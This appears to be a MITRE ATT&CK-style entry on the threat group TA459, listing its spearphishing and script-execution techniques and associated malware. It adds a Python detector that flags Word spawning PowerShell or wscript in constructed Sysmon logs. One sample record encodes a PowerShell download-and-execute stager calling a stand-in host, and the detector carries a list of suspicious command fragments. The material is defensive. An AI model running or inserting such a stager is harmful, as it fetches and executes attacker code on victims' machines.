
TA459

TA459 is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. (Citation: Proofpoint TA459 April 2017)
ID: G0062
Associated Groups: 
Version: 1.1
Created: 18 Apr 2018
Last Modified: 30 Mar 2020


Techniques Used

Domain ID Name Use

Enterprise T1059.001 Command and Scripting Interpreter: PowerShell

TA459 has used PowerShell for execution of a payload. (Citation: Proofpoint TA459 April 2017)

Enterprise T1059.005 Command and Scripting Interpreter: Visual Basic

TA459 has used a VBScript for execution. (Citation: Proofpoint TA459 April 2017)

Enterprise T1566.001 Phishing: Spearphishing Attachment

TA459 has targeted victims using spearphishing emails with malicious Microsoft Word attachments. (Citation: Proofpoint TA459 April 2017)

Enterprise T1204.002 User Execution: Malicious File

TA459 has attempted to get victims to open malicious Microsoft Word attachments sent via spearphishing. (Citation: Proofpoint TA459 April 2017)
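The four techniques above form one execution chain: a spearphished Word document (T1566.001) that the victim opens (T1204.002) and that then launches PowerShell (T1059.001) or a VBScript (T1059.005). The detection logic below is an added example written for this entry; it is not part of the ATT&CK or SECURITM page and not TA459 tooling. It scans Sysmon Event ID 1 (process creation) records in a simplified key="value" form, flags an Office parent spawning a script host, and decodes any PowerShell -EncodedCommand so the analyst sees what the lure actually ran. The log records, the field names, the c2.example.invalid host and the list of suspicious command-line fragments are all constructed assumptions.

```python
"""
Added detection example for the TA459 chain (T1566.001 -> T1204.002 -> T1059.001/.005).
Not part of the ATT&CK or SECURITM page. Input: constructed Sysmon Event ID 1
records in a simplified key="value" form (an assumption, not real telemetry).
"""
import base64
import ntpath
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Word is the lure named in the entry; Excel/PowerPoint are added as an assumption.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Script hosts for T1059.001 and T1059.005, plus cmd.exe/mshta.exe as common intermediaries.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "cmd.exe", "mshta.exe"}
# Fragments typical of hidden or staged execution (assumed list; case-insensitive substring match).
SUSPICIOUS_FRAGMENTS = ("-nop", "-enc", "hidden", "downloadstring", "frombase64string",
                        "invoke-expression", "\\temp\\")

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


@dataclass
class Finding:
    user: str
    parent: str
    child: str
    severity: str
    reasons: List[str] = field(default_factory=list)
    decoded: Optional[str] = None


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key="value" record into a dict; backslashes in paths are kept verbatim."""
    return dict(FIELD_RE.findall(line))


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the plaintext of a PowerShell -EncodedCommand (base64 of UTF-16LE), if present."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(lines: List[str]) -> List[Finding]:
    """Return one Finding per process-creation event in which an Office app spawns a script host."""
    findings: List[Finding] = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "1":
            continue  # only process-creation events carry a parent/child pair
        parent = ntpath.basename(ev.get("ParentImage", "")).lower()
        child = ntpath.basename(ev.get("Image", "")).lower()
        if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
            continue
        reasons = [f"{parent} spawned {child}"]
        cmd = ev.get("CommandLine", "")
        reasons += [f"command line contains '{frag}'" for frag in SUSPICIOUS_FRAGMENTS if frag in cmd.lower()]
        decoded = decode_encoded_command(cmd)
        if decoded and any(frag in decoded.lower() for frag in SUSPICIOUS_FRAGMENTS):
            reasons.append("decoded -EncodedCommand stages or evaluates remote content")
        severity = "high" if len(reasons) > 1 else "medium"
        findings.append(Finding(ev.get("User", "?"), parent, child, severity, reasons, decoded))
    return findings


# Constructed payload for record 1: what a hidden, encoded PowerShell stager typically looks like.
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s.ps1')".encode("utf-16-le")
).decode()

# Constructed records (not real telemetry). 1 and 2 model the TA459 chain; 3 to 5 are benign noise.
SAMPLE_LOG = [
    'EventID="1" Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
    f'CommandLine="powershell.exe -nop -w hidden -enc {_ENC}" User="CORP\\jdoe"',
    'EventID="1" Image="C:\\Windows\\System32\\wscript.exe" '
    'ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
    'CommandLine="wscript.exe //B C:\\Users\\jdoe\\AppData\\Local\\Temp\\invoice.vbs" User="CORP\\jdoe"',
    'EventID="1" Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'ParentImage="C:\\Windows\\explorer.exe" CommandLine="powershell.exe -Command Get-Process" User="CORP\\admin"',
    'EventID="1" Image="C:\\Windows\\splwow64.exe" '
    'ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" CommandLine="splwow64.exe" User="CORP\\jdoe"',
    'EventID="3" Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" User="CORP\\jdoe"',
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f"[{f.severity}] {f.user}: {f.parent} -> {f.child}; " + "; ".join(f.reasons))
        if f.decoded:
            print("    decoded:", f.decoded)
```

Two of the five constructed records are flagged: Word spawning encoded PowerShell (high, with the decoded DownloadString stager shown) and Word spawning wscript.exe on a .vbs in the user's Temp folder (high). The admin's interactive PowerShell, Word's print helper and the network event are left alone. The parent/child pairing is the robust signal; the fragment list only raises severity and should be tuned per environment, since legitimate macros and add-ins occasionally spawn cmd.exe.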

Software

ID Name References Techniques

S0230 ZeroT
References: (Citation: Proofpoint TA459 April 2017) (Citation: Proofpoint ZeroT Feb 2017)
Techniques: Deobfuscate/Decode Files or Information, Bypass User Account Control, Windows Service, Binary Padding, DLL Side-Loading, System Network Configuration Discovery, System Information Discovery, Steganography, Web Protocols, Software Packing, Ingress Tool Transfer, Symmetric Cryptography, Encrypted/Encoded File

S0013 PlugX
References: (Citation: CIRCL PlugX March 2013) (Citation: Dell TG-3390) (Citation: DestroyRAT) (Citation: FireEye Clandestine Fox Part 2) (Citation: Kaba) (Citation: Korplug) (Citation: Lastline PlugX Analysis) (Citation: New DragonOK) (Citation: Novetta-Axiom) (Citation: Proofpoint TA459 April 2017) (Citation: Sogu) (Citation: Thoper) (Citation: TVT)
Techniques: Modify Registry, File and Directory Discovery, Masquerade Task or Service, Hidden Files and Directories, Multiband Communication, Non-Application Layer Protocol, Keylogging, Dead Drop Resolver, DLL Side-Loading, Process Discovery, Query Registry, DLL Search Order Hijacking, Network Share Discovery, MSBuild, Web Protocols, Windows Service, Windows Command Shell, Ingress Tool Transfer, System Checks, System Network Connections Discovery, Match Legitimate Name or Location, Registry Run Keys / Startup Folder, Custom Command and Control Protocol, DNS, Screen Capture, Commonly Used Port, Symmetric Cryptography, Deobfuscate/Decode Files or Information, Native API, Obfuscated Files or Information

S0032 gh0st RAT
References: (Citation: Arbor Musical Chairs Feb 2018) (Citation: FireEye Hacking Team) (Citation: Moudoor) (Citation: Mydoor) (Citation: Nccgroup Gh0st April 2018) (Citation: Novetta-Axiom) (Citation: Proofpoint TA459 April 2017)
Techniques: Shared Modules, Modify Registry, Ingress Tool Transfer, Process Injection, Rundll32, Service Execution, DLL Side-Loading, Command and Scripting Interpreter, Query Registry, Deobfuscate/Decode Files or Information, Symmetric Cryptography, Non-Application Layer Protocol, Native API, Process Discovery, Windows Service, Registry Run Keys / Startup Folder, Clear Windows Event Logs, System Information Discovery, File Deletion, Screen Capture, Fast Flux DNS, Keylogging, Standard Encoding, Encrypted Channel

S0033 NetTraveler
References: (Citation: Kaspersky NetTraveler) (Citation: Proofpoint TA459 April 2017)
Techniques: Application Window Discovery, Keylogging
